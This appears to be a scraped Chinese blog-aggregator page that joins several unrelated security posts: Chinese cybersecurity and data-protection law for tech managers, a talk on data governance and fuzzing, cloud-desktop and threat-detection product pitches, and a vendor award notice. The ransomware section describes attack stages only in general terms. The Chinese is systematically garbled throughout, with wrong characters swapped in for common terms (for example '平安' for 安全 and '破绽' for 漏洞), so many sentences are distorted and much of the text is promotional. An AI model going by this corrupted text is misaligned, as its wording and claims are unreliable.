January 13, 2022 · 1 min · jiezi

关于安全:研读网络安全法律法规提升技术管理者-法-商

每部法规都有法律等级,从宪法到法律,到行政法规,再到地方性的条例和部门规章制度。那么,网络安全相干的法律法规别离对应什么法律等级?理解不同法律法规的等级档次,能够帮忙咱们更好的了解国家在立法过程中的目标。 一、网络和数据安全相干法律法规的研读 从2013年公布的《征信管理条例》,到2015年的《中华人民共和国国家安全法》,再到与网络安全相干的《网络安全法》《明码法》《网络安全审查方法》等,与数据业务相干的《数据安全法》《个人信息保护法》等,甚至对一些生物信息(如人脸识别)的束缚,从工夫程序来看,咱们国家在整体国家平安的高度曾经逐渐实现根本的法律制度布局,而网络安全和数据安全则是整体平安空间的一个细分维度,在了解这一系列法律法规制度时,能够从这个国家平安外围纲领的角度去思考,就能够更容易的了解和领会。 尽管当初《数安法》和《个保法》强调要促成数据交易流通,然而数据确权问题作为数据交易外围的要件目前仍未有定论,数据确权制度尚未建设。随着各个行业的一直倒退,分工合作一直的细化,任何一个企业要想充分利用数据,使得数据产生更高的价值,就不能仅应用本人繁多的数据,但想要交融应用更多数据,又会波及到集体数据安全的问题,特地是《个保法》出台之后,对于个人信息数据的平安曾经回升到了法律层面。如果不能解决数据确权问题,将会限度数据的交易。 2021年10月24日,复旦大学特聘传授、重庆市原市长黄奇帆在由中国金融四十人论坛主办的第三届外滩金融峰会上发表演讲,对数据确权如何做给出了倡议,笼罩了所有权、使用权、所有权、交易权以及管辖权。依据该倡议,包含解决能力、数据处理计划等等一系列数据建设,都将能够进行交易。也阐明了目前国家正在加紧制订相干法规规范,推动并建设数据资源确实权、凋谢、流通以及交易的相干制度。 对于技术管理者本身的几点倡议 随着国家在网络和数据方面的法律法规一直的健全,而且国家在法律法规中也明确要求公司须要保障网络安全和建设数据治理体系,作为技术管理者来讲,须要一直的学习,继续晋升本人,推动公司在网络和数据方面进一步满足国家的各方面要求。以下是对于技术管理者的几点倡议: 1.技术管理者集体须要晋升 “法商” 对于技术管理者而言,很多时候关注的是技术体系、架构以及对于业务的撑持等方面,然而既然法律层面对于公司有了诸多要求,那么作为技术管理者必须要在这方面有更多的学习和思考,学法懂法用法,这也是将来大势所趋。 在不远的未来,具备 “法商” 是对技术管理者的根本要求。 将网络安全和数据安全作为生命线企业负责人是平安的第一负责人,而技术管理者则是平安的间接负责人,一旦出了事,企业负责人和技术管理者首当其冲,然而企业负责人往往还要思考到经营的其余方面因素,可能会对网络安全和数据安全器重水平有余,因而,技术管理者有任务要让企业负责人充分认识到网络安全和数据安全的重要性。 在继续思考网络安全和平安体系建设的根底上,继续综合思考产品的设计,均衡产品的多方面因素和利弊衡量,尽可能将网络安全和数据安全纳入到产品的内生要求中去。而且不同部门有不同业务指标,当业务指标有抵触时,应该以公司利益最大化和危险可控化为准则。 另外,还须要全方位的培训并坚定要求执行到位。这点看起来容易但执行起来却很难。哪怕是看似简略的一个小点,执行起来也会呈现诸多问题,而一旦呈现平安问题,首先要承担责任的就是技术管理者以及企业负责人。 三、对于网络和数据安全体系建设的重点倡议 理清网络状况、零碎资产、数据资产等 理清网络状况、零碎资产、数据资产,是做好平安体系建设的根底,并且在建设和经营过程中也须要继续进行。这些梳理工作说起来简略但施行起来十分困难,能够认为是一家公司IT综合治理能力的侧面体现。而且初步梳理实现之后,还须要制订相干的整改和梳理措施,推动资产的治理更加有序,在处理的过程往往同时须要具备急躁和仔细,并且防止犯错引起事变。 尽可能穷举所有的应答并且制订执行打算 事实上,咱们是无奈穷举所有的应答的,然而要尽快能把所想到的问题和应答都思考进去,依据轻重缓急来制订具体的执行打算。对于危害性高、破绽重大的尽快补洞。简略先做,简单后做,做的过程中能够分步做或者以迭代的形式做,边做边收割。 系统性、全局性的思考数据安全体系建设 数据安全体系建设必要具备全局性和系统性思维。以行业内从事数据生产和经营的相似公司为例,从数据流向来看,能够初步分为“输出”、“加工解决” 和“输入”三个阶段。 在数据 “输出” 阶段,数据次要来自于两大块,第一个是自有的业务数据,第二个是第三方的数据,不论是来自哪方的数据,都要保障非法合规。 数据 “加工解决” 阶段是公司经营和生产的重点。数据加工解决从下到上须要思考四个层面的问题:合规保障、平安保障、效率保障和生产经营。每个层面其中,都包含很零碎很简单的体系设计。 最初一个阶段是数据 “输入”,有些公司即便没有商业输入,也可能会呈现数据交换的需要,也能够认为是狭义的 “输入”。数据除了恪守国家对应的法律法规之外,还须要恪守行业标准。如果是波及金融数据的话,须要恪守人行的要求标准,目前集体征信机构是在金融畛域集体数据输入的规范通道。 营销类平台个别有三类,第一个就是建一个本人的营销平台,并且对接媒体方和广告主,在目前的阶段也须要通过确保集体受权链条的残缺;第二个是应用内部的大平台做投放经营,比方抖音,这时候须要特地留神的是,尽可能通过平台的人员标签进行经营投放。第三个就是隐衷计算,目前这个是广告营销畛域的一个方向。 如果是报告类和企业类的输入,则能够通过各地的数交所和企业征信,它们都是国家认证的通道。 必须围绕结合实际业务 任何公司最初还是要依赖主营业务来继续经营上来,因而在做平安的同时,也必须要思考理论业务状况,确保业务安稳有序推动。 思考供应链平安问题 Ø 洽购网络产品和服务的考量 网络产品和服务是否满足《网络安全审查方法的要求》,这些网络产品和服务包含但不限于:云服务、CDN、平安服务、安全设备等。 Ø 洽购内部软件服务的考量 ◆思考软件国产化(信创)◆思考平安保护的费用◆思考外包和外部服务之间的数据安全◆思考内部公司的保护账号的治理◆合同中对于法律权责的要求 Ø 洽购内部数据服务的考量 ◆思考合作方的数据是否合规非法◆思考合作方是否可能提供《数安法》和《个保法》的相干要求。

January 13, 2022 · 1 min · jiezi

关于安全:复旦大学陈平博士网络攻击猖獗如何应对数据安全与内生安全挑战

近日,CCF上海分部联结CCF CTO Club(上海)和星环科技举办了“数据安全与流通技术”闭门研讨会。 研讨会围绕 “谁来爱护数据安全”、“企业如何依法进行数据安全加固及翻新” 以及 “数据经济如何衰弱倒退” 等热点话题,邀请了来自出名高校、科技企业和律所等50多位业内专家们独特交换探讨。CCF CTO Club(上海)成员、星环科技联结创始人刘汪根主持了论坛。 复旦大学大数据研究院研究员陈平博士做了“数据安全与内生平安”的主题演讲。(以下为演讲速记整顿,所有为现场信息为准) 1.动态进攻零碎不能抵制网络攻击 近几年来网络攻击越来越猖狂,指标不仅是咱们的个人电脑,也包含国家重要的网络基础设施。例如2017年臭名远扬的 Wannacry 勒索蠕虫攻打,在短短的三天工夫内,至多100多个国家和地区上百万电脑设备蒙受攻打,并且造成全世界40亿美元的损失。 往年5月,美国最重要的燃油管道运营商 Colonial Pipeline 受到了勒索病毒攻打,导致 Colonial Pipeline 敞开其美国东部沿海各州供油的要害燃油网络,美国也因而发表进入国家紧急状态。 影响顽劣的还有驰名的心脏滴血攻打和震网攻打。2014年,一个名为 “心脏滴血” 的 OpenSSL 破绽,可能导致大量用户名和明码泄露。三年后2017年,仍然有靠近20万个服务器和设施仍然笼罩在心脏滴血的恐怖之中。 作为世界上首个网络 “超级破坏性武器”,震网病毒Stuxnet 的计算机病毒曾经感化了寰球超过45000个网络,伊朗受到的攻打最为重大,60%的个人电脑感化了这种病毒。计算机安防专家认为,该病毒是有史以来最高端的 “蠕虫” 病毒。 目前的平安进攻零碎为什么没有能阻止这些攻打的产生呢?传统的动态进攻零碎不能抵制网络攻击。 信息安全始终随同着信息技术的倒退而倒退。平安人员为了进攻黑客的攻打,采纳很多安全措施,如设计防火墙阻止歹意连贯,设计入侵检测零碎捕获歹意行为;设计反病毒来避免零碎被恶意软件感化;下载补丁修复破绽等等。 然而这所有传统进攻都是动态的、被动的,针对的是一些已知的安全漏洞或者攻打,一旦遇到未知的破绽攻打,传统的办法体系就很快会被冲破,因而传统的动态进攻零碎不能抵制网络攻击。 2.如何化解数据安全治理面临的挑战? 那么应该如何爱护数据外围资产平安是摆在企业以及平安人员背后的一道难题。 我想先从数据安全治理的角度谈一谈对数据安全的意识。我认为,数据安全是以合规治理为驱动,数据资产治理为抓手,依据数据安全生命周期进行治理。 首先,外围抓手数据资产治理。 具体的,在数据资产治理中,须要晓得数据资产是什么,数据资产如何治理。这两个问题引发4个子问题,即要解决敏感数据是什么,在哪里,谁负责以及要与谁共享。 对于 “重要敏感数据有哪些” 这一问题挑战是如何用无限的人力,抓企业最关怀的数据资产;对于 “数据在哪里,谁负责,给谁用”,咱们面临的挑战是企业业务倒退、零碎迭代,人员变迁,导致数据流动性大,人员治理老本高,治理笼罩容易有脱漏。 为了应答挑战,咱们应该有一套零碎自动化梳理的办法,来主动发现和治理数据资产,别离从零碎侧和大数据侧进行数据资产的辨认。 在零碎侧,找出敏感数据与接口,并一一落到责任人。具体的,应该从流量中检测发现有哪些敏感数据,发现哪些后端接口流出了该敏感数据,定位到后端负责人;再发现哪些前端零碎应用了这些后端敏感接口,定位系统负责人。 在大数据侧,则是找到敏感字段与表,并在敏感字段变动时保留最后的敏感标签。库/表数据通过自动化辨认+人工打标的形式进行分级分类治理,对于衍生表,能够通过大数据血统治理,确保敏感字段计算演变时不失落敏感标签。 为此,重点的治理方向是数据分级分类和敏感数据&接口辨认。在分级分类中,须要各个部门独特梳理,包含共享数据分类、公开数据分类、业务数据分类,以及重要水平分级等。 其次,数据全生命周期管控。 在数据分级分类根底上,要对数据安全生命周期治理,依照数据采集、传输、存储、解决、共享以及销毁来进行。 为此,重点的治理方向是权限治理、终端管控、员工行为基线剖析以及安全意识培训。 在权限方面,不仅要提供权限治理的零碎和办法,而且也要加强人员参加时的安全意识,例如权限过大的问题。因而须要业务部门独特参加; 在终端DLP上,平安牵头落地,各业务部门、内审、法务、HR帮忙继续经营; 在员工行为剖析和基线上,被动发现员工的敏感数据获取异样行为; 在安全意识培训方面,指定平安行为标准规范,多元化信息安全培训教育等。 3.倒退自动化破绽开掘 除了数据安全治理面临的问题,咱们还面临着未知破绽威逼。自动化破绽开掘,能够帮忙企业在肯定水平上确保信息资产的平安。 首先是检测破绽的挑战。一般来说,程序是一个有向图,咱们称之为控制流图。在控制流图上,奔溃点是一个节点,任何一个函数调用都是连贯一对节点的箭头。程序存在破绽,会在某种条件输出下奔溃,并终止于 Crash 点。在自动化测试时候,咱们要思考所有的可能执行门路。而门路的数目是指数爆炸的,因而,自动化破绽检测的挑战是如何无效地结构输出触发程序Crash。 通过对自动化破绽开掘十多年的钻研,设计出一套针对源代码/二进制的破绽开掘框架,包含代码适配、破绽开掘以及破绽定位。 代码适配是指,给定一个程序,通过语言适配器将其转化为两头语言,在两头语言根底上进行插桩。所谓插桩是指在程序中插入检测代码。在程序插桩后,通过含糊测试工具联合符号执行进行输出结构,触发破绽。当程序奔溃时,再通过破绽定位剖析,找到破绽点。 在程序插桩方面,提出了一种轻量级的零碎的动态插桩工具。该文章发表在JCS、TIFS 上。该插桩工具与现有插桩工具不同,防止了插桩引起的额定跳转开销,以及利用虚拟机化执行的开销。 其次,咱们设计了一种轻量级的两头语言,该两头语言是对底层指令的封装,反对 Address+Link、Definition-Use 剖析。 程序插桩提供两个性能:一是门路笼罩的计算;二是程序破绽检测的代码。 接着,咱们在程序转换和剖析根底上,构建混合测试。与传统的 Fuzzer 不同,咱们的 Fuzzer 采纳符号执行技术领导 Fuzzing 的输出结构,放慢 Fuzzing 的效率,减少 Fuzzing 的笼罩。 ...

January 12, 2022 · 1 min · jiezi

关于安全:阿里云刘强无影云电脑构建云上安全办公室

简介:无影云电脑提供触手可及的算力,在云办公、外企办公、分支机构办公、软件开发、人力外包等场景构建云上平安办公室。 2021年12月21日,阿里云弹性计算年度峰会在上海正式举办,并通过全实景进行直播。峰会上,阿里云智能无影产品总监刘强带来了主题为“无影:连贯触手可及的算力,构建云上平安办公室”的演讲,具体解读了无影云电脑的产品劣势及其如何为企业办公赋能。 图:阿里云智能无影产品总监刘强 01 触手可及的算力,全方位满足企业客户需要只有云和端的有机交融能力形成触手可及的算力。云端的算力就像是太极的阳面,云电脑的算力是太极的阴面,云和端的算力有很大的相似性,也有很大的互补性。 云跟端有同样千亿级的市场规模,都同样处在IT行业、同样的商业模式,但因为云服务器的拜访是命令行的拜访模式、低频的交互场景,云电脑场景是高频的强交互场景,所以云电脑的倒退很受网络条件制约。 云网端技术继续演进,汇聚到2020年产生质的飞跃,妨碍云电脑倒退的次要限度均被突破。 2020年新冠疫情席卷寰球,疫情的呈现助推了大家对于云业务的认同,很多人上了云课堂、教学,隔离期间或多或少都应用了各种各样的云服务,疫情教育了云的潜在客户,让大家更加认同云计算理念。 另外,云计算通过了十一年的倒退,规模效应失去了积攒,云计算的倒退能够把云电脑的倒退老本摊销,让云电脑的价格与云PC的价格差不多,这是在云的倒退。 网络层面,2020年5G开始了大规模的建设,将来如果云电脑进一步倒退到边缘计算的畛域,就是MEC节点畛域,网络提早会失去进一步优化,届时本地电脑和云电脑的应用就没有差别了,所有的场景都能够跑在云端。 云和网的变动,使得终端的算力能够变得越来越小,大量的算力迁到云端,终端也能够用很灵便的形式来做各种各样的展示,比如说一体机、卡片机、折叠屏,甚至能够把云电脑集成到鼠标、键盘、显示器、VR眼镜、摄像头等等,能够集成到很多中央,云电脑会以多端的形式出现,造成一种全新的计算架构,一种全新的电脑状态。 无影产品和弹性计算是孪生产品,所以无影云电脑人造具备阿里云的弱小势能,领有超强的互补劣势。在云上,云服务器往往是生产的环节,云电脑是研发环节,而研发和生产能够联动,这样就可能把握买通产业生态和穿插营销的能力,也是一个互补的场景。 比方价格优势就源于云的互补,云服务器上运行了很多业务,包含直播、社交等娱乐业务,大部分是在早晨,而云电脑次要是运行工作类业务,次要是在白天,这样就能错峰应用算力,同时上行带宽和上行带宽也造成了很好的互补,这样的能力互补最终让云电脑有了一个很大的劣势。 另外,云服务器是一个根底产品,而无影云电脑是构建在云服务器上的应用层产品,这就意味着只有是有云服务器部署的中央就能够部署无影云电脑,所以无影云电脑在刚诞生的时候就有了规模化的劣势,阿里云计算、存储、网络遍布寰球,既是弹性计算的,也是无影的,这使得用户能够随时随地取得有限的算力。 算力如何交付到最终用户侧呢?咱们次要通过灵便的终端进行交付,包含软终端、硬终端、卡片机、一体机等终端设备,使得无处不在的算力变得触手可及。而对于集体IT办公需要来说,可能实现跨屏、跨利用、跨操作系统的协同就是最好的便捷体现。 终端的算力是无限的,而云上的算力是有限的,既能够有CPU,也能够有GPU,所以在终端无奈实现的运算,能够放到云端来运算,以此给终端带来更大的想象力。还能够在云端搭建计算机集群,学生能够用来跑实验课,这是云端可能实现而终端算力无奈达到的场景。 对于企业来说,要求便捷的同时平安也是重中之重。平安、便捷的生产力是为企业带去的外围价值,云办公、外企、研发、设计等场景都能够通过无影的产品状态来满足。 灵便的特点体现在既能够在平板上利用,也能够在手机上利用,甚至还能够在电脑上利用,跨操作系统和平台,随时随地的拜访,这是利用产品的价值。 这些产品状态背地依赖着相应的产品能力,产品能力根植于阿里云提供的计算、存储、网络、平安等各种各样的产品能力,而这些产品能力汇总在一起,由无影产品的功能模块包装,就造成了无影的产品能力。除此之外,还有丰盛的交付状态,私有云、专有云、云盒、本地云等等,能够满足不同类型客户的业务需要。 02 无影云电脑的平安办公的五大利用场景随着企业办公及互联网业务的倒退,越来越多的场景须要通过应用云电脑的形式来解决不同问题,而在服务客户的过程中,无影云电脑的劣势也被最大化的释放出来,得以赋能企业或集体客户,实现高效、平安的办公。 1、云办公场景越来越多的企业,其客户、零碎甚至员工都通过互联网协同工作,同时很多公司采取众包的工作形式,这种便捷、先进的工作模式为企业带来了较低的人工成本,然而同时会带来很多问题。 2021年出台了《集体信息安全保护法》,个人隐私泄露变成很重大的问题,以至可能呈现员工窃取数据、导致老板背上法律责任的状况,这样对平安层面提出了更高的需要。在这样的需要和现实情况下,应用无影的计划能够保证数据不落盘,爱护近程办公的数据安全,因为很多数据并没有落到本地,员工只不过是近程拜访了云上的办公室,数据可能爱护的更加平安。 2、外企办公场景很多外企在国内是轻资产的经营模式,而云恰好可能满足轻资产的需要,且外企监管比拟严格、流程比拟标准,对信息安全要求比拟高,云电脑能够解决零信赖等平安解决方案,可能保障数据安全。 同时外企有很多跨国公司须要跨境的网络买通,这是云网络买通的能力,而通过云电脑的形式来拜访,数据自身不落盘,数据无奈拷出,只能看不能拷贝,并且云电脑还能够配备安全监控软件,有利于对立治理,可能提供十分平安的服务。 3、分支机构办公场景因为国内企业的分支机构,它的互联互通仅仅是国内互联互通的需要,外企往往须要做跨国的数据联通的需要。这种状况下能够在云上构建一个云上办公室,将一根专线连到总部,即可实现跨国数据联通。 在不同的应用场景下,通过多region部署,针对不同机构所在的地区,可通过互联网、VPN、专线等多种形式接入,保障桌面的应用体验。 4、软件开发场景对于传统软件可能遇到的如代码泄露的问题,对数据代码进行爱护,数据不落盘,这个是云电脑在软件开发场景中的外围价值。随着挪动互联网时代的到来,要保障员工或者供应商上下游可能随时随地的接入到现有的零碎外面,须要有一个弱小便捷的公共云服务,这是云电脑所善于的。同时还须要有简单的身份认证的逻辑,因为场景变得复杂了,零信赖的计划也十分有必要。 无影云桌面的控制台和阿里云桌面控制台也在进行无效的联合,能够使云电脑具备很好的弹性伸缩的能力。以往的云原生都是服务端的云原生,退出云电脑当前,能够形成整个全栈式云原生,将客户端的研发环境纳入到云原生的环境当中,可能无效实现整个云原生环境的闭环化。 5、人力外包场景惯例的外包拆散岸外包和驻场外包,驻场外包治理绝对容易,离岸外包如果在外包公司场地办公,网络状况比较复杂,它的IP设施的接入也比较复杂,云电脑的形式可能保障数据安全、数据不落地,还能够做操作行为的平安审计,更好地保证数据的安全性。 总结来说,通过无影来连贯触手可及的算力,构建云上平安办公室,实现为企业胜利赋能,阿里云置信在将来可能实现更高更广的维度交融,一直成长翻新,为寰球的企业云上办公提供一股松软的力量。 原文链接本文为阿里云原创内容,未经容许不得转载。

January 7, 2022 · 1 min · jiezi

关于安全:腾讯安全月报|多个产品获国际研报认可携手天士力战略合作CSA云原生安全工作组成立……

January 4, 2022 · 0 min · jiezi

关于安全:从预防检测到响应腾讯御界NDR一站式勒索病毒解决方案

一、背景2021年上半年,勒索病毒席卷美国,受益企业损失动辄数千万美元。2021年,美国最大燃油管道商(Colonial Pipeline)、寰球最大的肉制品生产商JBS、寰球500强IT征询公司埃森哲等巨型企业先后遭逢勒索病毒攻打。《2021年勒索攻打特色与趋势钻研白皮书》指出,大型企业和基础设施成为攻打重点,国内局部公共服务机构、企业曾因勒索攻打导致服务全面中断,勒索攻打往往随同重大的数据泄露事件,被攻打的企业还可能面临与个人信息保护法、数据安全法等相干的法律诉讼。 腾讯高级威逼检测零碎(御界NDR)由腾讯天幕PaaS提供底层平安算力驱动,通过镜像网传统IT环境、私有云、公有云、单云、多云以及混合云架构并能更快络边界流量,联合海量平安数据,使用数据模型、平安模型、感知算法模型辨认各类网络攻击及高级威逼(APT攻打)。 御界NDR将勒索病毒相干危险通过“勒索病毒专题”进行场景化出现,通过丰盛的检测伎俩与可视化剖析,为政企机构平安运维人员提供丰盛直观的一站式勒索病毒检测治理平台。 二、勒索病毒入侵过程分析勒索病毒攻打个别包含四步:入侵->扩散->窃密->勒索,腾讯平安团队近年察看发现,勒索团伙的攻打手法已日趋APT化。即:攻击者会采纳任何可能的形式,对指标网络进行长期、持续性的探测入侵流动,通过内网横向扩散逐渐从繁多节点到控制目标外围零碎,先窃取高价值数据上传,最初开释加密组件一举瘫痪指标网络施行勒索攻打。 攻打后期,尝试探测投递攻击者对指标零碎的工作人员信息、零碎资产信息、组件信息进行详尽的收集探测,以便进行下一步的攻打武器投递。攻击者经常利用工作人员信息发送带有歹意链接的钓鱼邮件诱惑内部人员点击并借机执行恶意程序实现浸透;或是利用零碎资产对外开放的网络服务破绽(包含应用0day破绽)进行攻打尝试,从而攻陷裸露的外部资产。 在攻击者进行信息收集,资产危险探测的过程中,去扫描可能存在破绽的零碎,扫描高危端口(如445、3389),尝试投递勒索病毒;或针对存在破绽危险零碎,尝试近程攻打后提权。在此阶段,攻击者的次要行为包含:对低版本SMB协定扫描,SMB服务破绽利用,以及可疑钓鱼邮件链接拜访及下载操作。 尝试探测入侵阶段的所有操作往往须要与攻打指标服务器建设网络连接,实现扫描->破绽利用->武器投递的攻打链,从而产生大量异样的SMB、RDP南北向流量。 横向浸透,扩充攻击面当攻击者通过破绽利用或是钓鱼邮件等社工形式,攻陷指标零碎个别资产后,个别不会立即投放勒索病毒。因为这样制作的毁坏太无限了,勒索病毒团伙的指标是一次致命打击就迫使企业反对巨额赎金。攻击者会在胜利管制个别资产后,再尝试所有可能的形式进行横向扩散,尽可能去管制更多资产或外围资产。 攻击者会利用已失陷的资产对其余资产进行扫描浸透,比方扫描凋谢的SMB服务与RDP服务,以失陷的资产作为跳板对以后网段进行感化,扩充攻击面。一旦通过445端口、3389端口连贯胜利,则会尝试通过破绽利用进行感化,以管制尽可能多的网络资产; 其次,勒索病毒感染后会通过互联网与攻打服务器建设C&C连贯,传递失陷资产的主机信息,包含操作系统信息、IP 地址、地理位置、拜访权限以及加密密钥。若攻击者取得域管理员权限,会迅速通过近程命令发动其余攻打。这个阶段攻击者通常应用SMB服务端口445和RDP服务端口3389进行内网浸透,而应用规范端口 80 和 HTTP协定或端口 443 和 HTTPS 协定连贯C&C服务器,下载、执行近程指令。至此攻击者曾经实现提权->横向浸透->C&C连贯的攻打链,并产生大量异样的东西向SMB、RDP协定流量,以及HTTP(HTTPS),或是协定隧道的南北向流量。 窃取企业机密信息攻击者通过遍历已管制的企业服务器数据,将企业重要敏感信息上传到黑客管制的服务器,此期间,会产生大量异样网络流量。 加密数据,施行勒索最初一步,勒索病毒模块执行后,通常遍历本地目录,对本地文件的进行加密操作。勒索病毒也会感化网络共享目录。对网络共享文件的读写操作,会产生异样SMB协定流量。 三、御界NDR勒索病毒检测计划 御界NDR可对勒索病毒攻击面进行全面检测响应目前平安厂商针对勒索病毒的检测,次要集中在主机侧产品,比方主机平安产品、终端安全软件等。但基于网络流量的威逼检测和可视化更加有利于平安运维团队全面把握平安现状,对管制勒索病毒入侵施展着重大作用。 从流量侧进行勒索病毒攻打检测十分有利于还原事件全貌,有利于政企机构运维人员找到全网短板并采取针对性的加固措施。 通过网络流量检测勒索病毒的长处: 1.检测面广任何通过网络流传或在网络上造成破坏性行为的勒索病毒都会在流量中产生痕迹,流量侧可能感知到勒索攻打各个阶段的流量信息,检测面更广。 2.数据可信勒索病毒攻打过程中,存在歹意批改系统核心从而骗过主机侧文件一致性查看的可能,流量特色的元数据特色更可信,在勒索病毒曾经感化的环境中,不易受勒索病毒制作的假象以及反抗策略等困扰。 3.更易溯源随着海量多样化终端接入网络,主机侧对勒索病毒溯源剖析的工作量及难度将随着设施的接入规模与技术架构的异质化而减少。流量侧能够宏观感知到攻打过程中零碎里受影响的资产,做到有迹可循,有证可查,十分有利于平安运维团队综合主机侧、流量侧威逼告警来追溯事件,根治网络安全短板。 4.更加轻量流量侧检测更加轻量,只需在网络中镜像流量到产品中即可疾速无效定位危险。基于以上劣势,腾讯御界NDR平安团队针对勒索病毒的通信行为,加密伎俩,流传办法等纬度进行深刻的钻研,聚焦实在场景下的客户痛点,将御界NDR产品能力落地到“勒索病毒”专题场景,帮忙客户针对性进行威逼发现与提前预警。通过御界NDR的产品能力尽所有可能增强检测和响应,将勒索病毒攻打扼杀在施行加密攻打之前。 御界NDR产品蕴含如下检测伎俩: 勒索病毒指纹检测:对已知勒索病毒的指纹进行检测,御界NDR具备国内当先的专家知识库,取得国内权威机构评测认证,内置数千勒索病毒的指纹特色;沙箱检测:御界NDR联合腾讯自研反病毒引擎TAV以及云端大数据能力,依附深度沙箱中的动态分析模块、动态剖析模块以及稳固高效的任务调度框架,实现自动化、智能化、可定制化的样本剖析,对文件进行精确的剖析鉴定,并通过建设大规模剖析集群,积淀了包含深度学习在内的多个高覆盖率的歹意样本检测模型,精准高效地对现网中的挖勒索病毒进行打击。勒索病毒威逼情报能力:协同腾讯威逼情报系统,提供万级的勒索病毒相干威逼情报数据,涵盖歹意文件Hash、歹意URL及C2地址等,可对已知勒索病毒或变种病毒精准检测。未知勒索病毒检测:御界NDR基于SMB、RDP、SSH等网络协议进行深度解析,对文件操作、数据传输、近程拜访、外联通信等行为进行基线模型剖析,具备极强的检测泛化能力。资产脆弱性以及裸露面梳理:以WannaCry 勒索病毒家族为例,该病毒利用 微软MS17-010破绽与低版本的SMB组件进行流传。NDR领有深度协定解析能力,通过资产指纹识别技术剖析资产裸露的端口信息、服务信息、操作系统信息、SMB组件版本信息等,能够在勒索病毒传播产生前预警内网的高危资产。基于攻打链追溯算法的关联剖析检测:以时间轴为主线,通过ATT&CK攻打框架,将勒索病毒探测尝试、横向挪动、施行勒索等不同阶段的单点检测后果进行关联剖析,包含进行IP汇聚、事件可信分级、拜访关系关联剖析等,基于攻打链追溯算法还原勒索病毒入侵的整个流动过程,从而进行攻打追溯和绘制更精确的攻击者画像,最终将可信的勒索病毒相干威逼事件进行关联展现。四、御界NDR针对勒索病毒检测的五大劣势攻打门路残缺出现,全面感知勒索攻打御界NDR将勒索病毒的攻打流程拆分为内部侦察、病毒投递、内网侦察、横向浸透、加密感化、C2外联6个环节。通过勒索专题控制台界面可全面把握内网勒索病毒告警散布,全面感知勒索病毒对内网资产的威逼水平,不便平安运维人员果决采取措施阻止毁坏。 2.检测伎俩多样,对未知勒索病毒也可精准检测。御界NDR既蕴含已知勒索病毒的样本特色检测,也能笼罩未知勒索病毒检测。对未知勒索病毒的检测次要基于文件共享元数据进行,而不依赖病毒特色库,具备发现未知勒索病毒攻打的能力。 3.资产勒索危险披露,提前感知勒索威逼勒索病毒暴发前都会基于资产进行脆弱性扫描,例如裸露的敏感端口,零碎或者业务弱明码,低版本或者未打补丁的零碎等。御界NDR反对基于资产进行危险排查,对勒索病毒攻击面进行梳理,帮忙客户提现资产脆弱性问题。可在勒索攻打产生前提前感知威逼,有助于运维人员被动排查阻止毁坏产生。 4.勒索检测覆盖面广御界NDR目前已笼罩反对超过1000种勒索病毒检测和500多类勒索病毒赎金文件的检测,笼罩Windows、Linux以及Mac平台的勒索病毒检测,笼罩所有风行勒索病毒家族。 5.反对一键处理勒索攻打告警腾讯NDR底层基于腾讯天幕PaaS的平安算力算法能力,提供一键阻断危险资产连贯攻击者C&C服务器。在感知到勒索病毒事件时,运维团队能够迅速果决处理危险,阻止勒索病毒在内网扩散。 对于腾讯平安御界NDR团队 腾讯平安御界NDR团队以流量威逼检测为外围,专一于打造对威逼攻打检测溯源阻断一体式计划,全方位为不同行业企业及政府提供平安保障。目前腾讯NDR计划已在政务、金融、物流等多个行业胜利利用。通过联合规定引擎、哈勃沙箱、威逼情报、AI算法,由腾讯天幕PaaS平安算力算法撑持,进行实时流量协定解析及威逼检测、文件还原和流量信息存储,能疾速发现歹意攻打和潜在未知威逼,并实时响应阻断,为企业网络安全保驾护航。目前,腾讯NDR进入Gartner NDR 2021增长报告,跻身成为国内先进厂商。将来,腾讯平安将进一步施展本身在流量检测溯源及阻断上的劣势,协同生态搭档一道独特促成平安产业规模化倒退,更好地护航产业互联网倒退。

December 31, 2021 · 1 min · jiezi

关于安全:WireShark好学吗我来手把手教你学WireShark抓包及常用协议分析

December 31, 2021 · 0 min · jiezi

关于安全:双项荣誉-百度单次斩获信通院2021年云安全守卫者计划优秀案例两项大奖

2021年12月28日,由中国信息通信研究院、中国通信标准化协会主办,云计算开源产业联盟承办,中国通信标准化协会云计算规范和开源推动委员会反对的“2021可信云平安论坛”在京召开。北京百度网讯科技有限公司(以下简称“百度”)申报的"泰康团体内网数据安全我的项目"和"广东电网实网攻防演练我的项目"凭借其技术创新性与利用普适性,荣誉入选“2021年云平安守卫者打算”优良案例。 近年来,互联网技术与各个产业产生深度联合,促成了传统行业转型和新兴业务高速倒退。云计算作为新型基础设施建设的重要组成,成为产业数字化转型的重要撑持。而随着云计算平安态势日益严厉,安全性成为影响云计算充分发挥其作用的外围因素。云平安产品、解决方案涌现,百度凭借其当先的技术能力,在"泰康团体内网数据安全我的项目"和"广东电网实网攻防演练我的项目"中,为其合作方在解决数据安全和网络安全问题时提供了弱小助力。 "泰康团体内网数据安全我的项目":泰康保险集团股份有限公司是一家涵盖保险、资管、医养三大外围业务的大型保险金融服务团体,其业务承载了大量的客户信息,具备很强的保密性和安全性要求。而内部攻打和外部攻打愈演愈烈,以APT攻打为代表的高级继续攻打依然能找到各种破绽冲破企业的边界,同时,外部业务的非受权拜访、雇员犯错、无意的数据窃取等外部威逼层出不穷,这对泰康企业平安提出了更高的要求。在该合作项目中,泰康团体采纳百度数据安全解决方案进行内网平安防护,通过对内网的敏感信息进行定时的被动探测,获取数据内网敏感信息散布状况,并及时发现数据泄露危险点,推动业务修复,晋升企业数据安全管控能力;同时,产品具备开箱即用的劣势,无需业务革新即可对泰康团体的数据安全提供强有力的爱护。 百度数据安全解决方案实用场景 "广东电网实网攻防演练我的项目":广东电网有限责任公司是国有大型骨干企业中国南方电网有限责任公司的全资子公司,然而随着广东电网网络应用场景的一直扩大,网络安全边界在继续延长,以往各自为战且不足溯源能力的平安产品及防护策略越来越无奈满足当下严厉的平安防护须要。在该合作项目中,广东电网采纳百度智能威逼狩猎平台实现了对于平安威逼的疾速检测和响应,大幅升高了平安运维工作量,也取得了更有价值的数据为高级威逼剖析决策提供撑持,从而帮忙平安人员更为高效地应答0day、APT攻打等攻打事件。百度智能威逼狩猎平台弱小的溯源能力和对未知威逼高效的感知能力,更为广东电网在包含攻防演练在内的强溯源需要场景中的工作和口头中带来了加分。 百度智能威逼狩猎平台实用场景 始终以来,百度始终保持以凋谢的代码、凋谢的技术和凋谢的生态推动产业各界的交换与单干。将来,百度也将继续聚焦于云上AI平安技术的研发和实际,依靠百度平安的技术积攒,为云上资产平安提供无力保障,为云上用户提供牢靠的生产环境,护航产业互联网改革,减速产业智能化到来,助力智能计算新时代。点击进入取得更多技术信息~~

